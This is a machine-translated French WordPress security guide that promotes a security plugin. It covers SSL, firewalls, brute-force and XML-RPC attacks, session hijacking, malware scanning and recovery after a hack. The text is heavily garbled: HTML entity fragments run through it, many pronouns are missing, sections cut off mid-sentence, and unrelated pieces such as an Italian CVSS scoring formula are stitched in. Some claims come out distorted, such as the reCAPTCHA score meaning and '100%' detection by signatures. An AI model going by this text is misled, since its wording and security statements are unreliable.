Utilisez SSL. Pourquoi SSL est il si important? 2021 lamp;rsquoabsence damp;rsquoun certificat SSL est coûteuse. Comment est ce possible? SSL namp;rsquoest pas activé sur votre site Web, il sera difficile pour les Prospects de découvrir votre présence et ceux qui trouvent votre site peuvent avoir peur de donner de lamp;rsquoargent. Chaque fois que nous faisons des achats en ligne, il y a une communication entre votre navigateur et la boutique en ligne. Par exemple, lorsque nous entrons un numéro de carte de crédit dans notre navigateur, celui ci le partagera avec la boutique en ligne. Lorsque le magasin reçoit le paiement, dites au navigateur que votre achat a été réussi. Une chose à garder à lamp;rsquoesprit au sujet de lamp;rsquoinformation partagée entre le navigateur et le serveur Store est que lamp;rsquoinformation passe par plusieurs stations pendant la transmission. SSL crypte la communication pour samp;rsquoassurer que notre carte de crédit namp;rsquoest pas visible avant damp;rsquoatteindre la destination finale du serveur store. Pour mieux comprendre comment fonctionne le cryptage, réfléchissez à la façon dont nos achats sont livrés. avez déjà surveillé lamp;rsquoétat de livraison de vos achats en ligne, verrez combien damp;rsquoarrêts votre commande est passée avant damp;rsquoarriver chez . le vendeur namp;emballe pas ce que achetez, les gens peuvent facilement voir ce que achetez. SSL est un outil clé pour empêcher les attaquants damp;rsquointercepter des informations sensibles telles que les mots de passe et les numéros de carte de crédit partagés entre le client et le serveur Web. Pourquoi chaque site Web doit il avoir un certificat SSL? Les avantages de sécurité de WordPress d’avoir un certificat SSL sur votre site sont suffisants pour en faire une option incontournable sur n’importe quel site. Cependant, pour encourager tout le monde à protéger les visiteurs de leur site, les navigateurs Web et les moteurs de recherche créent des incitations négatives qui encouragent tout le monde à utiliser le SS
Le certificat SSL gratuit est fourni en utilisant le chiffrement let, mais il gère également automatiquement le renouvellement du certificat pour . 2021 SSL doit être activé sur le site WordPress. SSL protège la communication entre et vos clients, améliore votre référencement et offre aux visiteurs de votre site des facilités de sécurité lors de la navigation sur le site. Utiliser un pare feu d’application Web l’utilisation d’un pare feu d’application Web est un bon moyen d’ajouter un autre niveau de protection aux sites WordPress. Quamp;rsquoest ce quamp;rsquoun pare feu pour une application web? Un pare feu WAF ou application web aide à protéger votre site en surveillant le trafic Internet direct vers votre site avant quamp;rsquoil namp;rsquoatteigne votre site. En ajoutant WAF avant WordPress, pouvez ajouter un point de contrôle de sécurité entre Internet et votre site. Le trafic doit passer par WAF pour accéder à votre site Web. WAF détecte du trafic malveillant, comme csrf, xss, Injection SQL, etc., il filtrera le trafic avant quamp;rsquoil namp;rsquoatteigne votre site. De plus, WAF peut aider à détecter les attaques DDOS et à imposer des limites de vitesse pour empêcher les sites Web de samp;rsquoécraser.

Restreindre l’accès des appareils au tableau de bord WP la dernière étape de l’accès sécurisé à WordPress consiste à restreindre l’accès d’un Groupe d’appareils au tableau de bord WordPress. La fonctionnalité des appareils de confiance dans themes Security pro identifie les appareils que et d’autres utilisateurs utilisez pour accéder aux sites WordPress. Lorsquamp;rsquoun utilisateur se connecte à un appareil non reconnu, un appareil de confiance peut limiter sa fonctionnalité au niveau de lamp;rsquoAdministrateur. Cela signifie quamp;rsquoun hacker peut contourner vos autres méthodes de sécurité de connexion sans être susceptible damp;rsquoapporter des changements malveillants à votre site Web. Pour commencer à utiliser des appareils de confiance, activez les sur la page damp;rsquoaccueil des paramètres de sécurité, puis cliquez sur le bouton configurer les paramètres.

Dans les paramètres des appareils de confiance, décidez de lamp;rsquoutilisateur qui utilisera cette fonctionnalité, puis activez la fonctionnalité restrict et la protection contre les détournements de session.

Vous pouvez créer un nouvel utilisateur, lamp;rsquoappeler support et lui assigner un rôle U
Activez un robot pour surveiller le temps de disponibilité du site. Le robot vérifie votre site toutes les 5 minutes pour samp;rsquoassurer quamp;rsquoil est toujours en ligne. votre site namp;rsquoest pas actif, BOT avertira afin que puissiez mettre votre site en ligne à nouveau. Contrôle du robot: lamp;rsquoaudit du site ithemes sync pro utilise le robot Google Lighthouse pour vérifier la qualité de la page Web. Un autre bon exemple de robot de numérisation est un correcteur de liens déconnecté qui scanne votre site Web pour trouver des liens qui envoient à des endroits qui namp;rsquoexistent pas. Feeder BOT – un bon exemple de Feeder BOT est votre Podcast. Podcaster utilise un robot pour surveiller les flux RSS des podcasts auxquels êtes abonné et avertir lorsque vos podcasts préférés publient de nouveaux épisodes. Robot moteur de recherche: Google Web crawler est un exemple de robot moteur de recherche. Ce type de BOT scanne votre site Web pour trouver des pages nouvelles ou modifiées et crée un index pour votre site. Une fois que Google ou damp;rsquoautres moteurs de recherche auront lamp;rsquoindex de votre site, ils pourront partager vos pages avec ceux qui utilisent leur moteur de recherche. Robot de sécurité: le site scan damp;rsquoithemes Security pro utilise un robot pour comparer les plug ins et les listes de sujets installés à notre base de données de vulnérabilité. avez installé un plug in ou un thème avec une vulnérabilité connue, BOT applique automatiquement le correctif, samp;rsquoil est disponible. Robots de saisie de contenu défectueux: ces robots peuvent du contenu à partir de votre site Web sans votre permission. Le robot peut copier du contenu à utiliser sur le site damp;rsquoun attaquant pour améliorer son référencement et voler du trafic de votre site. Spambot – spambot est ennuyeux. Samp;rsquoengager à devenir millionnaire en travaillant à la maison pour envoyer
Visiteur damp;rsquoun site Web malveillant. Violence robotique violence robotique recherche des logins WordPress sur Internet pour les attaques. Une fois que les robots se connectent à la page damp;rsquoatterrissage, ils essaient la façon la plus simple damp;rsquoaccéder au site: essayez de deviner le nom damp;rsquoutilisateur et le mot de passe à plusieurs reprises jusquamp;rsquoà ce quamp;rsquoils réussissent. Comment arrêter un mauvais Robot sans arrêter un bon Robot: recaptcha V3 Google recaptcha aide à empêcher les robots malveillants de se livrer à des activités abusives sur votre site Web, comme essayer damp;rsquoentrer sur votre site avec un mot de passe divulgué, poster des pourriels, ou même gratter votre contenu. Cependant, les utilisateurs légitimes pourront se connecter, acheter, voir des pages ou créer des comptes. Recaptcha utilise des techniques avancées damp;rsquoanalyse des risques pour distinguer les humains des robots. La fonctionnalité Google recaptcha de themes Security pro protège votre site Web des robots malveillants. Ces robots essaient damp;rsquoutiliser des mots de passe divulgués pour accéder à votre site Web, poster des pourriels et même supprimer votre contenu. Recaptcha utilise des techniques avancées damp;rsquoanalyse des risques pour distinguer les humains des robots. Lamp;rsquoavantage de recaptcha version 3 est quamp;rsquoil aide à détecter le trafic de robots abusifs sur le site sans aucune interaction utilisateur. Recaptcha V3 namp;rsquoaffiche pas de défi de code de vérification, mais surveille les différentes demandes faites sur le site et renvoie un score pour chaque demande. Les scores sont compris entre 0,01 et 1. Plus le score retourné par recaptcha est élevé, plus il est possible de déterminer si une demande a été présentée. Plus le score de recaptcha est faible, plus le robot est confiant dans la demande. Themes Security pro permet de définir le seuil de blocage en utilisant le score recaptcha. Google recommande 0,5 comme valeur par défaut. Gardez à lamp;rsquoesprit que pouvez accidentellement bloquer les jambes de lamp;rsquoutilisateur
Cependant, devriez également enregistrer les résultats de chaque balayage de logiciels malveillants dans le journal de sécurité WordPress. Certains journaux de sécurité namp;rsquoenregistrent que les résultats de la numérisation des logiciels malveillants détectés, mais cela ne suffit pas. votre site Web est endommagé, devez en être informé dès que possible. Plus il faut de temps pour comprendre le hacker, plus il fait de mal.

Bien quamp;rsquoil soit agréable de constater que lamp;rsquoapproche proactive en matière de sécurité a porté ses fruits, ce namp;rsquoest quamp;rsquoun avantage, et non une justification documentée de chaque balayage de logiciels malveillants. namp;rsquoenregistrez pas les scans prévus, ne saurez pas samp;rsquoil y a des erreurs de scan. Lamp;rsquoéchec de lamp;rsquoenregistrement damp;rsquoune numérisation échouée peut faire croire que votre site vérifie les logiciels malveillants tous les jours, mais en fait, la numérisation namp;rsquoest pas terminée. Lisez l’article en vedette sur la fonctionnalité de numérisation du site et découvrez la raison numéro un pour laquelle ithemes Security pro protège contre les hackers WordPress. Activités de l’utilisateur conserver le Journal des activités de l’utilisateur dans le journal de sécurité WordPress peut faire gagner du temps après une attaque réussie. surveillez lamp;rsquoactivité correcte de lamp;rsquoutilisateur, il peut guider à travers le calendrier de piratage et montrer tout ce que le hacker a changé, de lamp;rsquoajout de nouveaux utilisateurs à lamp;rsquoajout damp;rsquoannonces indésirables de médicaments à votre site. Themes Security pro surveille cinq types damp;rsquoactivités des utilisateurs: 1. Connexion sortie

Chaque fois que éditez un fichier sur un site Web qui appartient au plug in ou au thème Themes, il est comparé à un fichier sur le serveur themes. le hachage de version de fichier sur votre site correspond au hachage de version sur le serveur Themes, il samp;rsquoagit damp;rsquoun changement légitime et ne serez pas averti. 3. Comparaison de fichiers WordPress en ligne. Org qu’il s’agisse d’un fichier de base WordPress ou d’un plug in installé à partir du dépôt WordPress. Org est modifié et le fichier sera comparé à la version sur WordPress. Organisation. le hachage correspond, le changement namp;rsquoest pas nuisible et ne reçoit pas damp;rsquoavertissement. 4. Exclusion manuelle pouvez exclure les fichiers, répertoires et types de fichiers de la détection des changements de fichiers dans les paramètres de détection des changements de fichiers.

	3 méthodes de mise en oeuvre du WAF il existe trois méthodes différentes de mise en oeuvre du WAF. Examinons les avantages et les inconvénients de chaque type. WAF basé sur le réseau: les WAF physiques ou basés sur le réseau sont basés sur le matériel. Le principal avantage du WAF basé sur le réseau est la faible latence due à lamp;rsquoinstallation locale. Toutefois, les inconvénients découlent des prix damp;rsquoentreposage et damp;rsquoentretien du matériel. Les prix et les exigences de stockage physique font que la plupart des gens font de mauvais choix. WAF basé sur l’hôte: WAF basé sur l’hôte ou local intégré dans WordPress, généralement en utilisant des plug ins. Lamp;rsquoavantage du WAF basé sur lamp;rsquohôte est quamp;rsquoil est moins cher que le WAF basé sur le réseau. Avantage d G les correctifs de routine et de sécurité publiés par Microsoft le deuxième mardi de chaque mois. Microsoft a publié des correctifs de sécurité sur une base aussi fiable, ce qui est fantastique. Patch est également le jour où Microsoft patch divulgue publiquement des vulnérabilités en matière de sécurité mardi. Consultez le contenu à mettre à jour dans le Guide de sécurité ultime de WordPress 2020 ebook et comment mettre à jour automatiquement pour savoir comment appliquer automatiquement les mises à jour de mardi. Le mercredi suivant la sortie du correctif de mardi, de nombreux attaquants sont généralement vus exploiter une vulnérabilité précédemment connue sur un système obsolète sans correctif. Par conséquent, le mercredi du prochain patch a été officiellement nommé mercredi de la vulnérabilité. Pourquoi un hacker vise t il une vulnérabilité corrigée? Les hackers visent à corriger les vulnérabilités parce quamp;rsquoils savent que les gens ne les mettront pas à jour (y compris les plug ins et les sujets sur le site). La divulgation publique des vulnérabilités le jour de lamp;rsquoapplication du correctif est une norme de lamp;rsquoindustrie. Une fois quamp;rsquoune vulnérabilité est divulguée publiquement, elle devient une « vulnérabilité connue » dans une version obsolète et non corrigée du logiciel. Les logiciels présentant des vulnérabilités connues peuvent facilement être ciblés par des pirates informatiques. Les hackers aiment les cibles faciles à attaquer et les logiciels avec des vulnérabilités connues sont comme des instructions étape par étape pour les hackers d’accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Divulgation responsable pouvez demander pourquoi une vulnérabilité peut se produire si elle offre une occasion damp;rsquoattaque à un hacker. Eh bien, il est courant que les chercheurs en sécurité découvrent les vulnérabilités en privé et les signalent aux développeurs de logiciels. Sous réserve damp;rsquoune divulgation responsable, lamp;rsquoétude initiale sera présentée en privé à: Public Mais, comme lamp;rsquoattaque de mercredi, le hacker a verrouillé la vulnérabilité même si un correctif a été publié. Dans les jours et les semaines qui ont suivi la divulgation de la vulnérabilité de conformité de WP gdpr, nous avons reçu un grand nombre de rapports selon lesquels le site WordPress a été compromis par des attaquants qui exploitent cette vulnérabilité. Le principal coupable de la corruption du site WordPress est un plugin ou un thème vulnérable avec des correctifs disponibles mais non appliqués. Questo Kos frossrant!!!!! Cela signifie que la plupart des hackers WP peuvent être arrêtés. Il est choquant de penser à ceux qui ont dépensé beaucoup damp;rsquoargent pour nettoyer le site, aux revenus quamp;rsquoils ont perdus pendant quamp;rsquoil était inactif, et aux revenus futurs quamp;rsquoils ont perdus en perdant la confiance de leurs clients. Vous serez encore plus choqué quand saurez que toute cette douleur peut être évitée par une simple mise à jour. Les fonctionnalités de gestion de version d’ithemes Security pro permettent de personnaliser et de mettre à jour automatiquement WordPress. Le suivi des vulnérabilités WordPress garder les plug ins et les thèmes à jour ne protégera pas contre chaque vulnérabilité WordPress. Certains plugins et thèmes WordPress ont été abandonnés par les développeurs qui les ont créés. Malheureusement, si un plug in ou un thème obsolète a une vulnérabilité, il ne recevra jamais de correctif. Les pirates cibleront les sites Web qui utilisent ces plug ins qui sont maintenant vulnérables de façon permanente. Une vulnérabilité de suivi est la différence entre avoir un site Web sécurisé et un site Web facilement accessible aux pirates informatiques. avez un plug in obsolète avec une vulnérabilité connue sur votre site, fournissez aux pirates informatiques les éléments dont ils ont besoin pour contrôler votre site. Camp;rsquoest pourquoi devez suivre toutes les dernières vulnérabilités Utilisateurs légitimes. 2. Limitez les tentatives d’authentification externe en demandant qu’il y ait d’autres façons de connecter à WordPress en plus d’utiliser le formulaire de connexion. Avec XML RPC, un attaquant peut effectuer des centaines de tentatives de nom damp;rsquoutilisateur et de mot de passe dans une seule requête HTTP. La méthode damp;rsquoamplification violente permet à un attaquant damp;rsquoutiliser XML RPC pour des milliers de tentatives de nom damp;rsquoutilisateur et de mot de passe dans plusieurs requêtes http. En utilisant wordpress pour ajuster les paramètres d’ithemes Security pro, pouvez bloquer plusieurs tentatives d’authentification par demande XML RPC. Limiter le nombre de tentatives de nom d’utilisateur et de mot de passe à une par demande protégera grandement votre accès à WordPress.	3. La restriction de lamp;rsquoaccès à la protection contre la violence en ligne concerne la protection contre la violence locale. La protection contre la violence locale ne vérifie que les tentatives damp;rsquoaccès à votre site et interdit les utilisateurs en fonction des règles de blocage spécifiées dans vos paramètres de sécurité. La protection contre la cyberviolence va encore plus loin. Le réseau est une communauté sécurisée damp;rsquothemes avec plus damp;rsquoun million de sites Web. lamp;rsquoIP est trouvée en tentant damp;rsquoaccéder au site Web de la communauté de sécurité damp;rsquoThemes, elle est ajoutée à la liste des voleurs de réseau de Bruce force. Une fois quamp;rsquoune IP est inscrite sur la liste damp;rsquointerdiction de la violence sur Internet, elle est bloquée sur tous les sites du réseau. Par conséquent, si une IP attaque mon site Web et est interdite, elle sera signalée au réseau de violence de sécurité themes. Mon rapport peut aider à désactiver lamp;rsquoIP sur le réseau. J’aime aider à protéger l’accès WordPress des autres en activant simplement la protection réseau sécurisée d’themes. Pour commencer à utiliser la protection de la force réseau, activez la sur la page damp;rsquoaccueil des paramètres de sécurité.	Puis entrez votre adresse E mail, sélectionnez si souhaitez recevoir des mises à jour par e mail, puis cliquez sur le bouton Enregistrer.
Lorsque activez les nouveaux paramètres de périphérique de confiance, les utilisateurs sont informés des périphériques en attente non reconnus dans la barre d’administration WordPress. lamp;rsquoappareil actuel namp;rsquoa pas été ajouté à la liste des appareils de confiance, cliquez sur le lien confirmer cet appareil pour envoyer un courriel damp;rsquoautorisation.	Cliquez sur le bouton confirmer lamp;rsquoappareil dans un courriel de connexion non reconnu pour ajouter lamp;rsquoappareil actuel à la liste des appareils de confiance.	L’accessibilité de la page d’atterrissage WordPress en fait la partie la plus vulnérable et potentiellement vulnérable de tout site WordPress. Cependant, l’utilisation des étapes de cette section rendra votre accès WordPress presque impénétrable. S Exécuter sur notre site Web. La bonne nouvelle, c’est que la plupart des attaques contre les comptes utilisateurs de WordPress peuvent être évitées avec un peu d’effort de votre part. Voyons ce que pouvez faire pour protéger vos utilisateurs de WordPress. En effet, ces méthodes de sécurité WordPress aideront à protéger n’importe quel type d’utilisateur WordPress. Cependant, lorsque nous examinons chaque méthode, nous faisons savoir quels utilisateurs devraient être nécessaires pour lamp;rsquoutiliser. 1. La façon la plus simple de protéger le site Web en ne fournissant aux utilisateurs que les fonctions dont ils ont besoin est de ne fournir aux utilisateurs que les fonctions dont ils ont besoin et non damp;rsquoautres fonctions. la seule chose que quelquamp;rsquoun fera sur votre site est de créer et damp;rsquoéditer son propre billet de blog, alors namp;rsquoavez pas besoin damp;rsquoéditer le billet de quelquamp;rsquoun damp;rsquoautre. 2. Dans la liste compilée par Splash Data, les utilisateurs de WordPress sont protégés par des mots de passe complexes. Le mot de passe le plus courant dans toutes les décharges de données est 123456. Data dump est une base de données piratée contenant les mots de passe des utilisateurs téléchargés sur Internet. 123456 est le mot de passe le plus courant dans les décharges de données, pouvez imaginer combien de personnes utilisent des mots de passe faibles sur votre site? Utiliser un code faible est comme essayer de fermer la porte avec un morceau de ruban adhésif. Il namp;rsquoa jamais fallu beaucoup de temps aux hackers pour pénétrer brutalement le site en dehors des mots de passe faibles. Aujourdamp;rsquohui, les pirates informatiques utilisent des cartes graphiques pour attaquer, et le temps nécessaire pour déchiffrer le mot de passe namp;rsquoa jamais été réduit. Par exemple, regardons un diagramme créé par terahash, une entreprise de craquage de mot de passe haute performance. Leur graphique montre le temps nécessaire pour déchiffrer le mot de passe en utilisant le cluster 448x RTX 2080 Hash stack.	Par défaut, WordPress utilise le hachage MD5 pour stocker les mots de passe de l’utilisateur dans la base de données O chaque fois que visitez le site, une session WordPress génère un cookie de session. Supposons que votre extension de navigateur a été abandonnée par un développeur et que ne Publiez plus de mises à jour de sécurité. Malheureusement, les extensions de navigateur négligées ont une vulnérabilité. Cette vulnérabilité permet à un attaquant de détourner des cookies de navigateur, y compris les cookies de session WordPress mentionnés ci dessus. Ce type de hacker est appelé détournement de session. Ainsi, un attaquant peut exploiter une vulnérabilité étendue pour monter votre connexion et commencer à apporter des modifications malveillantes à vos utilisateurs WordPress. Vous devriez fournir une protection contre les détournements de session aux administrateurs et aux éditeurs. La fonctionnalité des appareils de confiance dans themes Security pro fait du détournement de session un passé. lamp;rsquoappareil de lamp;rsquoutilisateur change pendant la session, Themes Security déconnecte automatiquement lamp;rsquoutilisateur afin damp;empêcher toute activité non autorisée sur le compte de lamp;rsquoutilisateur, comme changer lamp;rsquoadresse e mail de lamp;rsquoutilisateur ou un plug in malveillant. 6. Chaque fois que créez un nouvel utilisateur, créez un utilisateur de soutien général et ajoutez un autre point damp;rsquoentrée disponible pour les pirates informatiques. Cependant, parfois, votre site Web peut avoir besoin damp;rsquoaide extérieure, par exemple après avoir demandé du soutien ou engagé un entrepreneur indépendant. Vous avez besoin damp;rsquoun moyen sûr damp;rsquoajouter un accès administratif temporaire à votre site Web. Par exemple, supposons quamp;rsquoil y ait un problème avec un plug in installé sur votre site Web. Après avoir communiqué avec le personnel de soutien, il doit accéder à votre site Web en tant quamp;rsquoadministrateur afin quamp;rsquoil puisse le consulter attentivement. Cela semble être une demande très raisonnable et avez décidé de leur accorder lamp;rsquoaccès. Alors Vous permet de supprimer un utilisateur lorsquamp;rsquoil namp;rsquoa plus besoin damp;rsquoaccéder à votre site. La meilleure pratique pour WordPress Security est de supprimer tous les utilisateurs inutilisés de votre site. Quamp;rsquoest ce quamp;rsquoune mise à jour des permissions? La fonctionnalité damp;rsquoamélioration des privilèges damp;rsquoithemes Security pro permet damp;rsquoaccorder temporairement des fonctionnalités supplémentaires aux utilisateurs. La mise à jour des permissions facilite et sécurise la création damp;rsquoutilisateurs génériques que pouvez mettre à la disposition de tout développeur externe ou technicien de soutien qui a besoin damp;rsquoun accès temporaire à votre site Web. La mise à jour des permissions permet de créer un nouvel utilisateur, de lamp;rsquoappeler support et de lamp;rsquoassigner au rôle damp;rsquoutilisateur de lamp;rsquoabonné. La prochaine fois que aurez besoin damp;rsquoun accès temporaire au site, pouvez déplacer les utilisateurs de soutien de lamp;rsquoabonné à lamp;rsquoAdministrateur. Nous verrons comment le faire dans les prochains messages, Mais commençons par expliquer pourquoi lamp;rsquoamélioration des permissions est un meilleur moyen damp;rsquoaccorder lamp;rsquoaccès à votre site. Pourquoi les permissions de mise à niveau sont elles meilleures? mple: namp;rsquoavez pas à créer un nouvel utilisateur chaque fois que accordez lamp;rsquoaccès au site. Automatique: lamp;rsquoaugmentation des permissions ne dure que 24 heures. Après 24 heures, lamp;rsquoutilisateur perd automatiquement toutes les autres permissions. Vous namp;rsquoavez pas besoin de souvenir de supprimer un utilisateur ou de changer un mot de passe. Sans sacrifier la sécurité: Vous pouvez toujours demander à cet utilisateur de support universel de connecter en utilisant la méthode de courriel à deux facteurs, ce qui signifie que avez le même niveau de sécurité que les autres utilisateurs administratifs. Étant donné que le rôle réel de lamp;rsquoutilisateur est celui damp;rsquoun abonné, il namp;rsquoy a aucun risque réel de le laisser sur le site. Comment utiliser la mise à jour des permissions dans themes Security pro pour commencer, activez la mise à jour des permissions sur la page principale des paramètres de sécurité.
Le premier type damp;rsquoactivité damp;rsquoutilisateur enregistré est lamp;rsquoheure et le lieu où lamp;rsquoutilisateur se connecte et se déconnecte de votre site Web. Le suivi de lamp;rsquoheure et de lamp;emplacement de lamp;rsquoaccès de lamp;rsquoutilisateur peut aider à identifier les utilisateurs endommagés. Lamp;rsquoutilisateur se connecte t il à des heures anormales ou à partir damp;rsquoun nouvel emplacement? camp;rsquoest le cas, voudrez peut être commencer à enquêter sur eux. 2. Création inscription de lamp;rsquoutilisateur	Prochaine activité pour le cuivre Vous devriez lamp;rsquoexécuter parce quamp;rsquoun tel balayage est généralement le moins précis. Détection de signature et de comportement détection de logiciels malveillants la plupart des logiciels malveillants Scan et antivirus utilisent des signatures de logiciels malveillants pour détecter les logiciels malveillants. La numérisation de logiciels malveillants à la fine pointe de la technologie combinera la détection de signature et lamp;rsquoanalyse comportementale.	gnature du logiciel malveillant une signature du logiciel malveillant est une série damp;rsquooctets utilisés pour identifier un fragment de logiciel malveillant connu. Certains scanners de logiciels malveillants sont pilotés par une base de données contenant des signatures de logiciels malveillants de millions de virus connus. La numérisation des logiciels malveillants basée sur les signatures est rapide et simple et détectera 100% des logiciels malveillants connus et bien connus. Tout cela est génial pour capturer les logiciels malveillants ajoutés par les hackers de bas niveau. Cependant, les hackers expérimentés savent que le scanner de logiciels malveillants vérifie les signatures de logiciels malveillants connus. Ces hackers ont la capacité de brouiller les signatures des logiciels malveillants afin quamp;rsquoils ne puissent pas être détectés par un scanner normal. La vitesse de publication des nouveaux logiciels malveillants empêche le scanner de logiciels malveillants de tenir sa base de données à jour avec toutes les signatures les plus récentes. Par conséquent, les scanners basés sur la signature ne seront pas en mesure de distinguer les nouveaux logiciels malveillants des fichiers README. Txt du plug in. Analyse du comportement lamp;rsquoanalyse du comportement surveille le fonctionnement du logiciel pour déterminer samp;rsquoil est nuisible. De nombreux types de comportement peuvent être considérés comme suspects ou nuisibles. Par exemple, lamp;rsquoAPI de navigation sécurisée de Google est utilisée pour protéger les sites Web de la numérisation du site themes Security pro. Google Security browse vérifie si le logiciel redirige le trafic vers des sites Web malveillants connus. De même, il namp;rsquoexiste aucun moyen fiable de détecter les logiciels malveillants. Mais la combinaison du contrôle du comportement et de la signature augmentera considérablement vos chances damp;rsquoêtre averti Lamp;rsquoinquiétude. Ithemes Security pro ne crée pas de notification damp;rsquoédition de fichier pour les changements quamp;rsquoil peut vérifier. Mise à jour du plug in thème par le gestionnaire de version la fonctionnalité du gestionnaire de version dans themes Security pro permet de mettre à jour automatiquement WordPress, les plug ins et les thèmes.	le gestionnaire de version termine la mise à jour, Themes Security pro connaît la source de la mise à jour et ne déclenche pas damp;rsquoalerte. 2. Comparaison de fichiers entre le plug in Themes et le thème sélectionnez la case à cocher « comparaison de fichiers en ligne » dans les paramètres de détection des changements de fichiers pour activer la comparaison de fichiers en ligne.

La règle générale est damp;rsquoexclure les fichiers dont savez quamp;rsquoils seront mis à jour périodiquement. La sauvegarde et la mise en cache de fichiers en sont un bon exemple. Lamp;rsquoexclusion de ces types de fichiers réduira considérablement le bruit supplémentaire. Il y a 7 signes que votre site WordPress a été piraté et retrouverez à penser: « mon site WordPress a t il été piraté? » signifie que avez besoin de réponses rapides. Plus vite découvrez des signes de violation du site, plus vite nettoyez votre site. Plus vite nettoyez votre site, moins le piratage endommage votre site. 1. Votre page d’accueil est différente
Lieu Vous souvenez du plug in de conformité WP gdpr précédent? En novembre 2018, nous avons reçu des rapports sur la création de nouveaux utilisateurs administratifs sur le site Web du client. Un hacker exploite une vulnérabilité dans le plug in de conformité WP gdpr (une vulnérabilité corrigée dans la version 1.4.3) pour créer un nouvel utilisateur Administrateur sur le site WordPress qui exécute le plug in. Une vulnérabilité de plug in permet à un utilisateur non autorisé de modifier lamp;rsquoenregistrement de lamp;rsquoutilisateur en changeant le nouveau rôle damp;rsquoutilisateur par défaut de lamp;rsquoabonné à lamp;rsquoAdministrateur. Malheureusement, ce namp;rsquoest pas la seule vulnérabilité que ne pouvez pas simplement supprimer un nouvel utilisateur créé par un attaquant et réparer le plug in. avez installé WP gdpr compliance et woocommerce, votre site peut avoir été injecté avec du Code malveillant. Un attaquant peut utiliser lamp;rsquoinstallateur de fond du plug in woocommerce pour insérer lamp;rsquoinstallateur de porte dérobée dans la base de données. une porte dérobée est installée sur votre site, devriez contacter un spécialiste de la réparation des pirates informatiques. Une autre option est de faire reculer la copie du site en utilisant le fichier de sauvegarde, puis de la détruire en utilisant la sauvegarde précédente. n’avez pas accès au site WordPress, même après avoir réinitialisé votre mot de passe, il peut s’agir d’un signe grave d’infection. Lorsque le dépôt gentoo github est piraté, la première chose quamp;rsquoun attaquant fait est de supprimer tous les utilisateurs administratifs. Comment ce hacker a t il accédé à leur compte github? Le mot de passe de lamp;rsquoutilisateur gentoo admin a été trouvé sur un autre site. Je suppose que le nom damp;rsquoutilisateur et le mot de passe ont été trouvés en saisissant ou en vidant la base de données. Bien que le mot de passe administrateur de leur compte gentoo github soit différent du mot de passe utilisé sur le compte compromis, il est très similaire. So s
Camp;rsquoest comme si jamp;rsquoavais utilisé iamawesome2021 comme mot de passe sur un compte et iamawesome2021 sur un autre site. Par conséquent, les hackers peuvent trouver le mot de passe avec un peu damp;rsquoeffort. Comme nous lamp;rsquoavons vu, devriez utiliser un mot de passe unique pour chaque compte. Il ne suffit pas de changer le mot de passe. Avec lastpass, pouvez générer et stocker en toute sécurité des mots de passe uniques et sécurisés pour chaque site. Comment se remettre damp;rsquoune catastrophe? En cas de suspicion damp;rsquoinfraction, des mesures rapides peuvent être prises pour atténuer les dommages. La façon la plus sûre de restaurer une vulnérabilité de sécurité damp;rsquoannulation de sauvegarde de site précédente propre est de restaurer le site à la version précédente avant lamp;rsquoattaque. C’est pourquoi il est si important d’avoir une solution de sauvegarde WordPress complète. Nous recommandons damp;rsquoutiliser backupbuddy pour programmer des sauvegardes automatiques afin quamp;rsquoil y ait toujours des sauvegardes. Gardez à lamp;rsquoesprit que la récupération damp;rsquoune sauvegarde précédente peut encore rendre votre site vulnérable aux mêmes vulnérabilités, il est donc important de suivre ces étapes. La mise à jour immédiate de tous les plug ins et thèmes obsolètes les plug ins ou thèmes vulnérables peuvent encore être à blâmer, il est donc important de mettre à jour immédiatement tous les plug ins ou thèmes obsolètes. Même si le site est restauré à une version propre et précédente, la même vulnérabilité persiste et peut encore être compromise. Vous voudrez peut être également vérifier si exécutez un plug in ou un sujet vulnérable qui namp;rsquoa toujours pas de correctifs fournis par le développeur. Vous devez supprimer ce plug in maintenant. Activer lamp;rsquoauthentification à deux facteurs si namp;rsquoutilisez pas lamp;rsquoauthentification à deux facteurs pour protéger lamp;rsquoaccès de lamp;rsquoAdministrateur, activez la maintenant. Ce niveau de sécurité supplémentaire aidera à samp;rsquoassurer que les utilisateurs non autorisés namp;rsquoont accès à aucun compte Administrateur. C
Erca aide les logiciels malveillants professionnels à supprimer les vulnérabilités de sécurité WordPress se produisent au niveau du serveur (plus profond que l’installation de WordPress), de sorte que pourriez avoir besoin de contacter le service professionnel de suppression de logiciels malveillants. Nous recommandons damp;rsquoutiliser wewatchyourweb pour la suppression de logiciels malveillants professionnels. Conclusion: le Guide de sécurité WordPress ultime dans ce guide de sécurité WordPress, nous avons déjà beaucoup présenté! Cependant, comme indiqué dans ce guide, bloquerez complètement les attaques contre votre site Web. Le plugin de sécurité WordPress peut aider à protéger les sites WordPress liés aux thèmes de sécurité WordPress dans ce guide, le plugin de sécurité WordPress peut aider à protéger vos sites WordPress. Notre plugin de sécurité WordPress, Themes Security pro, offre plus de 50 façons de protéger votre site contre les vulnérabilités de sécurité WordPress communes. Avec wordpress, l’authentification à deux facteurs, la protection contre la violence, l’exécution de mots de passe complexes et d’autres fonctionnalités, pouvez ajouter une couche de sécurité supplémentaire à votre site. amp;lt= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase 0.029] 3.25 × [ISCBase 0.02] 15 Where, ISCBase = 1 [(1 ImpactConf) × (1 ImpactInteg) × (1 ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction 2. Metriche del punteggio temporale Le metriche temporali misurano lo stato attuale delle tecniche di exploit, lamp;039esistenza di eventuali patch o soluzioni alternative o la fiducia che si ha nella descrizione di una vulnerabilità. Le metriche temporali sono previste e cambieranno nel tempo. 2.1. Scadenza codice exploit (E) La maturità del codice exploit si basa sulla probabilità che la vulnerabilità venga attaccata. Più è facile sfruttare una vulnerabilità, più alto è il punteggio di vulnerabilità.

Michael Moore organise chaque semaine des rapports de vulnérabilité wordpress pour aider à sécuriser votre site. En tant que Directrice des produits Themes, elle nous aide à continuer damp;rsquoaméliorer notre gamme de produits themes. Camp;rsquoest un super nerd qui aime apprendre toutes les techniques, anciennes et nouvelles. Michael sort avec sa femme et sa fille, lit des livres ou écoute de la musique quand il ne travaille pas.

ContactPress Supported By WordPress Plugins